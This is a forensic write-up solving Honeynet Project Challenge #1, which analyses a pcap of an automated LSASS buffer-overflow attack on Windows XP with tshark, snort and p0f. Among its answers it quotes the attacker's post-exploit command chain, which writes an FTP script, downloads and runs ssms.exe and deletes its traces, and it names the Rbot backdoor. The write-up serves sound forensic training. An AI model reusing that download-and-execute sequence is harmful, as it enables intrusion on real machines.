Honeynet Project Challenge #1 - pcap attack trace

tags: netsec, honeynet, pcap, forensic, 2010
pcap | official solution
  1. Which systems (i.e. IP addresses) are involved?
  2. tshark -r atk-trace.pcap -z ip_hosts,tree -qn
    unique IP addr: tshark -r atk-trace.pcap -T fields -e ip.dst -e ip.src | sort | uniq
    unique MAC addr: tshark -r atk-trace.pcap -T fields -e eth.dst -e eth.src | sort | uniq
  3. What can you find out about the attacking host (e.g., where is it located)?
  4. p0f -r atk-trace.pcap
    tshark -r atk-trace.pcap -Y "tcp.flags==0x02" -n
    sudo snort -q -A console -r atk-trace.pcap
  5. How many TCP sessions are contained in the dump file?
  6. tshark -r atk-trace.pcap -qnz conv,tcp
  7. How long did it take to perform the attack?
  8. capinfos atk-trace.pcap
  9. Which operating system was targeted by the attack? And which service? Which vulnerability?
  10. [os] atk-trace.pcap > pkt#16 > Native OS: Windows 5.1 i.e. Windows XP
    [svc] Local Security Authority Subsystem Service (LSASS)
    sudo snort -q -A console -c snort.conf -r atk-trace.pcap
    [**] [1:2514:7] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt
    [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1]
    {TCP} ->
  11. Can you sketch an overview of the general actions performed by the attacker?
    1. port scan 445/tcp
    2. connect to \\\ipc$\lsarpc
    3. exploit + bind shell to port 1957/tcp
    4. connect to port 1957/tcp to execute echo open 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
  12. What specific vulnerability was attacked?
  13. stack buffer overflow in DsRolerUpgradeDownlevelServer() function of LSASS, subsequently used for remote code exec
  14. What actions does the shellcode perform? Pls list the shellcode.
  15. bindshell on port 1957/tcp
  16. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
  17. yes, it ignores instruction to connect to an ftp service @ invalid IPv4 address
  18. Was there malware involved? What's the name of the malware?
  19. yes; an Rbot backdoor
  20. Do you think this is a manual or an automated attack? Why?
  21. automated; attack duration too short (~16s) to be manual, invalid IPv4 address specified